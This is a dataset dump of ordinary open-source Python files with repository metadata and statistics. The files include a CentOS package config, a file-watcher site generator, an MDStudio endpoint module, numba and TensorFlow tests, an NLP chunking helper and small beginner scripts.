| 0.029851
| false
| 0
| 0.074627
| 0
| 0.164179
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af55a7c4bf87a19d17230ce48e8785f847954198
| 891
|
py
|
Python
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 9
|
2016-04-17T02:09:47.000Z
|
2022-02-16T15:50:43.000Z
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | null | null | null |
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 6
|
2016-09-10T17:42:29.000Z
|
2021-11-28T09:06:36.000Z
|
from __future__ import absolute_import, division, unicode_literals
import os
import logging
OS_VERSIONS = ['6', '7']
DATA_DIR = '/tmp/centos_packages/'
REPO_BASE_URL = 'http://mirror.centos.org/centos/'
REPOSITORIES = ['os', 'updates', 'centosplus', 'extras', 'fasttrack']
REPOSITORIES_PRETTY = {'os': 'Base',
'updates': 'Updates',
'extras': 'Extras',
'fasttrack': 'Fasttrack'}
LIMIT_RESULTS = 250
CACHE_MAX_AGE = 4260
CACHE_IN_DEBUG_MODE = False
def active_repos():
return [repo for repo in REPOSITORIES if not repo == 'centosplus']
# Logging
LOGDIR = DATA_DIR + 'log/'
LOGFILE = LOGDIR + 'centos_packages.log'
if not os.path.isdir(LOGDIR):
os.makedirs(LOGDIR)
logging.basicConfig(filename=LOGFILE,
level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s')
| 29.7
| 70
| 0.637486
| 103
| 891
| 5.31068
| 0.601942
| 0.025594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013062
| 0.226712
| 891
| 29
| 71
| 30.724138
| 0.780842
| 0.007856
| 0
| 0
| 0
| 0
| 0.238095
| 0.02381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.130435
| 0.043478
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5737ecd87101e9cae87c5d6f7ba311642b6a63
| 2,622
|
py
|
Python
|
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
import os
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# Don't need Firestore for HTML dev
os.environ['SHOULD_USE_FIRESTORE'] = 'false'
from leaderboard_generator.config import config
# Catch up with unwatched changes
generate()
path = config.root_dir
event_handler = AutoGenTrigger()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def in_html_dir(path):
from leaderboard_generator.config import config
in_static = path.startswith(config.static_dir)
in_templates = path.startswith(config.template_dir)
ret = in_static or in_templates
return ret
def generate():
from leaderboard_generator.generate_site import generate
generate()
class AutoGenTrigger(FileSystemEventHandler):
def __init__(self):
super(AutoGenTrigger, self).__init__()
self.last_gen_time = -1
def on_moved(self, event):
super(AutoGenTrigger, self).on_moved(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Moved %s: from %s to %s", what, event.src_path,
event.dest_path)
def on_created(self, event):
super(AutoGenTrigger, self).on_created(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Created %s: %s", what, event.src_path)
def on_deleted(self, event):
super(AutoGenTrigger, self).on_deleted(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Deleted %s: %s", what, event.src_path)
def on_modified(self, event):
super(AutoGenTrigger, self).on_modified(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Modified %s: %s", what, event.src_path)
if event.is_directory:
return
if not in_html_dir(event.src_path):
return
if any(x in event.src_path for x in ['___jb']):
return
if self.last_gen_time == -1 or time.time() - self.last_gen_time > 5:
logging.info("Modified %s: %s", what, event.src_path)
generate()
self.last_gen_time = time.time()
if __name__ == '__main__':
main()
| 28.5
| 76
| 0.644165
| 328
| 2,622
| 4.945122
| 0.301829
| 0.034525
| 0.051788
| 0.055487
| 0.364365
| 0.334155
| 0.19852
| 0.166461
| 0.138101
| 0.138101
| 0
| 0.002037
| 0.250953
| 2,622
| 91
| 77
| 28.813187
| 0.823829
| 0.02479
| 0
| 0.181818
| 0
| 0
| 0.083399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.136364
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af57910bb3fe47ba44e22a72e31f84c5bdcbf609
| 10,239
|
py
|
Python
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 10
|
2017-09-14T07:26:15.000Z
|
2021-04-01T09:33:03.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 117
|
2017-09-13T08:09:48.000Z
|
2019-10-03T12:19:13.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 1
|
2018-09-26T09:40:51.000Z
|
2018-09-26T09:40:51.000Z
|
import json
import uuid
import six
from datetime import timedelta
from types import GeneratorType
from typing import Union, Optional, Callable
from jsonschema import ValidationError
from twisted.internet.defer import _inlineCallbacks, Deferred
from autobahn.wamp import RegisterOptions
from mdstudio.api.api_result import APIResult
from mdstudio.api.converter import convert_obj_to_json
from mdstudio.api.request_hash import request_hash
from mdstudio.api.schema import (ISchema, EndpointSchema, validate_json_schema, ClaimSchema,
MDStudioClaimSchema, InlineSchema, MDStudioSchema)
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
SchemaType = Union[str, dict, ISchema]
def validation_error(schema, instance, error, prefix, uri):
return \
'{prefix} validation on uri "{uri}" failed on "{property}": \n' \
'Subschema:\n{subschema}\ndid not match actual value:\n{subproperty}'.format(
prefix=prefix,
uri=uri,
property='.'.join(error.schema_path),
subschema=json.dumps(error.schema, indent=2),
subproperty=json.dumps(error.instance, indent=2)
)
class WampEndpoint(object):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
from mdstudio.component.impl.common import CommonSession
self.uri_suffix = uri
self.uri = None
self.options = options
self.scope = scope
self.instance = None # type: CommonSession
self.wrapped = wrapped_f
self.input_schema = self._to_schema(input_schema, EndpointSchema)
self.output_schema = self._to_schema(output_schema, EndpointSchema)
self.claim_schemas = [MDStudioClaimSchema(CommonSession)]
claim_schema = self._to_schema(claim_schema, ClaimSchema, {})
if claim_schema:
self.claim_schemas.append(claim_schema)
def set_instance(self, instance):
self.instance = instance
self.uri = u'{}.{}.endpoint.{}'.format(
self.instance.component_config.static.vendor,
self.instance.component_config.static.component,
self.uri_suffix
)
def register(self):
return self.instance.register(self, self.uri, options=self.options)
def __call__(self, request, signed_claims=None):
return self.execute(request, signed_claims)
@chainable
def execute(self, request, signed_claims):
if not signed_claims:
return_value(APIResult(error='Remote procedure was called without claims'))
from mdstudio.component.impl.common import CommonSession
request = convert_obj_to_json(request)
claims = yield super(CommonSession, self.instance).call(u'mdstudio.auth.endpoint.verify', signed_claims)
claim_errors = self.validate_claims(claims, request)
if claim_errors:
return_value(claim_errors)
request_errors = self.validate_request(request)
if request_errors:
return_value(request_errors)
result = self.call_wrapped(request, claims['claims'])
if isinstance(result, GeneratorType):
result = _inlineCallbacks(None, result, Deferred())
result = yield result
result = result if isinstance(result, APIResult) else APIResult(result)
convert_obj_to_json(result)
if 'error' in result:
return_value(result)
result_errors = self.validate_result(result.data)
if result_errors:
return_value(result_errors)
if 'error' in result:
return_value(result)
result_errors = self.validate_result(result.data)
if result_errors:
return_value(result_errors)
return_value(result)
def call_wrapped(self, request, claims):
return self.wrapped(self.instance, request, claims)
def validate_claims(self, claims, request):
if 'error' in claims:
res = APIResult(error=claims['error'])
elif 'expired' in claims:
res = APIResult(expired=claims['expired'])
else:
claims = claims['claims']
if claims['requestHash'] != request_hash(request):
res = APIResult(error='Request did not match the signed request')
elif claims['uri'] != self.uri:
res = APIResult(error='Claims were obtained for a different endpoint')
elif claims['action'] != 'call':
res = APIResult(error='Claims were not obtained for the action "call"')
else:
s = None
try:
for s in self.claim_schemas:
validate_json_schema(s.to_schema(), claims)
except ValidationError as e:
res = {'error': validation_error(s.to_schema(), claims, e, 'Claims', self.uri)}
self.instance.log.error('{error_message}', error_message=res['error'])
else:
if not self.instance.authorize_request(self.uri, claims):
res = APIResult(error='Unauthorized call to {}'.format(self.uri))
self.instance.log.error('{error_message}', error_message=res['error'])
else:
# Everything is OK, no errors
res = None
return res
def validate_request(self, request):
schema = self.input_schema.to_schema()
try:
validate_json_schema(schema, request)
except ValidationError as e:
return APIResult(error=validation_error(schema, request, e, 'Input', self.uri))
else:
# No validation errors
return None
def validate_result(self, result):
schema = self.output_schema.to_schema()
try:
validate_json_schema(schema, result)
except ValidationError as e:
res = APIResult(error=validation_error(schema, result, e, 'Output', self.uri))
else:
# No validation errors
res = None
return res
@staticmethod
def _to_schema(schema, schema_type, default_schema=None):
if isinstance(schema, (six.text_type, str)):
schema = schema_type(schema)
elif isinstance(schema, dict):
schema = InlineSchema(schema)
elif isinstance(schema, (schema_type, InlineSchema)):
schema = schema
elif not schema:
schema = InlineSchema({} if default_schema == {} else default_schema or {'type': 'null'})
else:
raise NotImplementedError('{} of type {} is not supported'.format(schema_type.__name__, type(schema)))
return schema
class CursorWampEndpoint(WampEndpoint):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
input_schema = InlineSchema({
'oneOf': [
{
'allOf': [
self._to_schema(input_schema, EndpointSchema),
self._to_schema('cursor-parameters/v1', MDStudioSchema)
]
},
self._to_schema('cursor-request/v1', MDStudioSchema),
]
})
output_schema = InlineSchema({
'allOf': [
self._to_schema(output_schema, EndpointSchema),
{
'properties': {
'results': self._to_schema('cursor-response/v1', MDStudioSchema)
}
}
]
})
super(CursorWampEndpoint, self).__init__(wrapped_f, uri, input_schema, output_schema, claim_schema, options, scope)
@chainable
def call_wrapped(self, request, claims):
meta = None
cid = None
if 'next' in request:
cid = request['next']
elif 'previous' in request:
cid = request['previous']
if cid:
meta = json.loads(self.instance.session.cache.extract('cursor#{}'.format(cid)))
if meta.get('uuid') != cid:
return_value(APIResult(error='You tried to get a cursor that doesn\'t exist or is expired. Please check your code.'))
if not meta:
meta = None
paging = {
'uri': self.uri
}
if 'paging' in request and 'limit' in request['paging']:
paging['limit'] = request['paging']['limit']
result, prev, nxt = yield self.wrapped(self.instance, request, claims['claims'], **{'paging': paging, 'meta': meta})
if prev:
prev_uuid = uuid.uuid4()
prev['uuid'] = prev_uuid
paging['previous'] = prev_uuid
self.instance.session.cache.put('cursor#{}'.format(prev_uuid), timedelta(minutes=10), json.dumps(prev))
if next:
next_uuid = uuid.uuid4()
nxt['uuid'] = next_uuid
paging['next'] = next_uuid
self.instance.session.cache.put('cursor#{}'.format(next_uuid), timedelta(minutes=10), json.dumps(nxt))
if not ('paging' in request or 'addPageInfo' in request['paging'] or request['paging']['addPageInfo']):
paging = {
'uri': paging['uri']
}
return_value({
'results': result,
'paging': paging
})
def endpoint(uri, input_schema, output_schema=None, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return WampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
def cursor_endpoint(uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return CursorWampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
| 38.205224
| 133
| 0.614611
| 1,109
| 10,239
| 5.51037
| 0.171326
| 0.029455
| 0.02651
| 0.02291
| 0.330551
| 0.281623
| 0.220749
| 0.190967
| 0.163476
| 0.16233
| 0
| 0.001501
| 0.284305
| 10,239
| 267
| 134
| 38.348315
| 0.832424
| 0.032523
| 0
| 0.239437
| 0
| 0
| 0.085968
| 0.00788
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079812
| false
| 0
| 0.079812
| 0.028169
| 0.230047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5b9601c04d7552ac03872881009c7fc625c108
| 1,832
|
py
|
Python
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division
from ctypes import *
import sys
from numba import unittest_support as unittest
from numba.compiler import compile_isolated
from numba import types
is_windows = sys.platform.startswith('win32')
if not is_windows:
proc = CDLL(None)
c_sin = proc.sin
c_sin.argtypes = [c_double]
c_sin.restype = c_double
def use_c_sin(x):
return c_sin(x)
ctype_wrapping = CFUNCTYPE(c_double, c_double)(use_c_sin)
def use_ctype_wrapping(x):
return ctype_wrapping(x)
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
def use_c_pointer(x):
"""
Running in Python will cause a segfault.
"""
threadstate = savethread()
x += 1
restorethread(threadstate)
return x
@unittest.skipIf(is_windows, "Test not supported on windows")
class TestCTypes(unittest.TestCase):
def test_c_sin(self):
pyfunc = use_c_sin
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_wrapping(self):
pyfunc = use_ctype_wrapping
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_voidptr(self):
pyfunc = use_c_pointer
# pyfunc will segfault if called
cres = compile_isolated(pyfunc, [types.int32])
cfunc = cres.entry_point
x = 123
self.assertTrue(cfunc(x), x + 1)
if __name__ == '__main__':
unittest.main()
| 24.105263
| 64
| 0.662664
| 234
| 1,832
| 4.92735
| 0.333333
| 0.027754
| 0.018213
| 0.065048
| 0.215091
| 0.171726
| 0.171726
| 0.171726
| 0.171726
| 0.171726
| 0
| 0.010925
| 0.250546
| 1,832
| 75
| 65
| 24.426667
| 0.828842
| 0.039301
| 0
| 0.18
| 0
| 0
| 0.024207
| 0
| 0
| 0
| 0
| 0
| 0.06
| 1
| 0.12
| false
| 0
| 0.12
| 0.04
| 0.32
| 0.02
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5fa4a7f4a8959df414d7dee58cac1a11ceef7d
| 875
|
py
|
Python
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | 1
|
2021-05-22T02:46:00.000Z
|
2021-05-22T02:46:00.000Z
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
def chunk_process(corpus):
all_processed = []
for i in corpus:
train_text = i
train_text = train_text.lower()
custom_tokenizer = PunktSentenceTokenizer(train_text)
tokenized = custom_tokenizer.tokenize(train_text)
pro = chunk_process_content(tokenized)
all_processed.append(pro)
return all_processed
def chunk_process_content(tokenized):
processed = []
for i in tokenized:
words = nltk.word_tokenize(i)
# Tags the words as nouns adjectives etc. (FOS)
tagged = nltk.pos_tag(words)
# print(tagged)
# Extract the required words from the corpus
pos = ["NN","NNS","NNP","JJR","JJS","NNPS","JJ"]
for (a,b) in tagged:
if b in pos:
processed.append(a)
# print(processed)
# t = set(processed)
t = []
for i in processed:
if i not in t: t.append(i)
# print(t)
processed = t
return processed
| 23.648649
| 57
| 0.666286
| 122
| 875
| 4.639344
| 0.418033
| 0.079505
| 0.031802
| 0.053004
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.221714
| 875
| 36
| 58
| 24.305556
| 0.831131
| 0.168
| 0
| 0
| 0
| 0
| 0.027739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af621cd414c91141313b31734d2740e917380a97
| 6,772
|
py
|
Python
|
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for subsettable_context.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_constrained_optimization.python.rates import subsettable_context
def create_contexts():
"""Returns a pair of `SubsettableContext`s to use in tests.
We'll refer to the two contexts as "context1" and "context2". Both are subsets
of the same parent context, which has:
penalty_predicate = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0]
constraint_predicate = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
context1 is subsetted from the parent context using:
penalty_predicate1 = [0, 0, 1, 1, 1, 1, 0, 0, 0, 0]
constraint_predicate1 = [1, 1, 0, 0, 0, 0, 1, 1, 1, 1]
while context2 is subsetted deom the parent context using:
penalty_predicate2 = [0, 0, 0, 0, 1, 1, 1, 1, 0, 0]
constraint_predicate2 = [1, 1, 1, 1, 0, 0, 0, 0, 1, 1]
Returns:
The pair (context1, context2).
"""
predictions = tf.constant(0.0, dtype=tf.float32, shape=(1,))
context = subsettable_context.rate_context(predictions)
penalty_predicate = tf.constant(
[True, False, True, False, True, False, True, False, True, False],
dtype=tf.bool)
constraint_predicate = tf.constant(
[False, True, False, True, False, True, False, True, False, True],
dtype=tf.bool)
context = context.subset(penalty_predicate, constraint_predicate)
penalty_predicate1 = tf.constant(
[False, False, True, True, True, True, False, False, False, False],
dtype=tf.bool)
constraint_predicate1 = tf.constant(
[True, True, False, False, False, False, True, True, True, True],
dtype=tf.bool)
penalty_predicate2 = tf.constant(
[False, False, False, False, True, True, True, True, False, False],
dtype=tf.bool)
constraint_predicate2 = tf.constant(
[True, True, True, True, False, False, False, False, True, True],
dtype=tf.bool)
context1 = context.subset(penalty_predicate1, constraint_predicate1)
context2 = context.subset(penalty_predicate2, constraint_predicate2)
return context1, context2
class SubsettableContextTest(tf.test.TestCase):
"""Tests for `SubsettableContext` class."""
def test_subset_of_subset(self):
"""Tests that taking the subset-of-a-subset works correctly."""
context1, context2 = create_contexts()
context1_penalty_predicate = context1.penalty_predicate.predicate
context1_constraint_predicate = context1.constraint_predicate.predicate
context2_penalty_predicate = context2.penalty_predicate.predicate
context2_constraint_predicate = context2.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that the subset of a subset ANDs the conditions together in
# condition1.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context1_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context1_constraint_predicate))
# Likewise in condition2.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context2_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context2_constraint_predicate))
def test_and(self):
"""Tests `SubsettableContext`'s logical AND operator."""
context1, context2 = create_contexts()
and_context = context1 & context2
and_context_penalty_predicate = and_context.penalty_predicate.predicate
and_context_constraint_predicate = (
and_context.constraint_predicate.predicate)
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that AND applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(and_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(and_context_constraint_predicate))
def test_or(self):
"""Tests `SubsettableContext`'s logical OR operator."""
context1, context2 = create_contexts()
or_context = context1 | context2
or_context_penalty_predicate = or_context.penalty_predicate.predicate
or_context_constraint_predicate = or_context.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that OR applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(or_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(or_context_constraint_predicate))
if __name__ == "__main__":
tf.test.main()
| 42.591195
| 80
| 0.656379
| 837
| 6,772
| 5.135006
| 0.188769
| 0.023732
| 0.022336
| 0.016752
| 0.487436
| 0.397859
| 0.388087
| 0.388087
| 0.336901
| 0.278269
| 0
| 0.041675
| 0.238187
| 6,772
| 158
| 81
| 42.860759
| 0.791432
| 0.266834
| 0
| 0.348315
| 0
| 0
| 0.001637
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 1
| 0.044944
| false
| 0
| 0.067416
| 0
| 0.134831
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6346ccaefda878793e2d456fe00155edd718ff
| 483
|
py
|
Python
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | 1
|
2018-07-17T17:09:38.000Z
|
2018-07-17T17:09:38.000Z
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
#list
list=["Apple","Mango","Banana","Pine Apple","Plum"]
for lst in list :
if lst=='Banana':
continue
else:
print(lst)
#tuples
tpls = ("apple", "banana", "cherry","banana",)
print("Tuples:",tpls)
#Set
st = set(("apple", "banana", "cherry"))
st.add("damson")
st.remove("banana")
print("Set:",st)
print("Length",len(st))
#Dictionary
dct = dict(apple="green", banana="yellow", cherry="red")
del(dct["banana"])
print("Dictionary:",dct)
| 20.125
| 57
| 0.583851
| 62
| 483
| 4.548387
| 0.483871
| 0.117021
| 0.120567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182195
| 483
| 23
| 58
| 21
| 0.713924
| 0.047619
| 0
| 0
| 0
| 0
| 0.314088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.3125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af63f358d135bd02b0acb291df904454267fe7f6
| 546
|
py
|
Python
|
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
import sqlite3
import time
import random
conn = sqlite3.connect('pokemon.db')
c = conn.cursor()
id = 0
def dynamic_data_entry():
name = input ("Name: ")
health = input ("Health: ")
stage = input ("Stage:")
ptype = input("Type: ")
retreat = input ("Retreat: ")
year = input ("Year: ")
c.execute("INSERT INTO pm VALUES ( ?,?,?,?,?,?,? )",
(id,name,health,stage,ptype,retreat,year))
conn.commit()
for i in range(600):
dynamic_data_entry()
time.sleep(1)
id += 1
c.close
conn.close()
| 17.0625
| 56
| 0.580586
| 70
| 546
| 4.471429
| 0.542857
| 0.070288
| 0.102236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019324
| 0.241758
| 546
| 31
| 57
| 17.612903
| 0.736715
| 0
| 0
| 0
| 0
| 0
| 0.164835
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.136364
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6432d71105fd52d5f472fb3ff046ac0d326424
| 2,603
|
py
|
Python
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 3
|
2016-01-27T19:49:23.000Z
|
2020-08-18T13:59:02.000Z
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
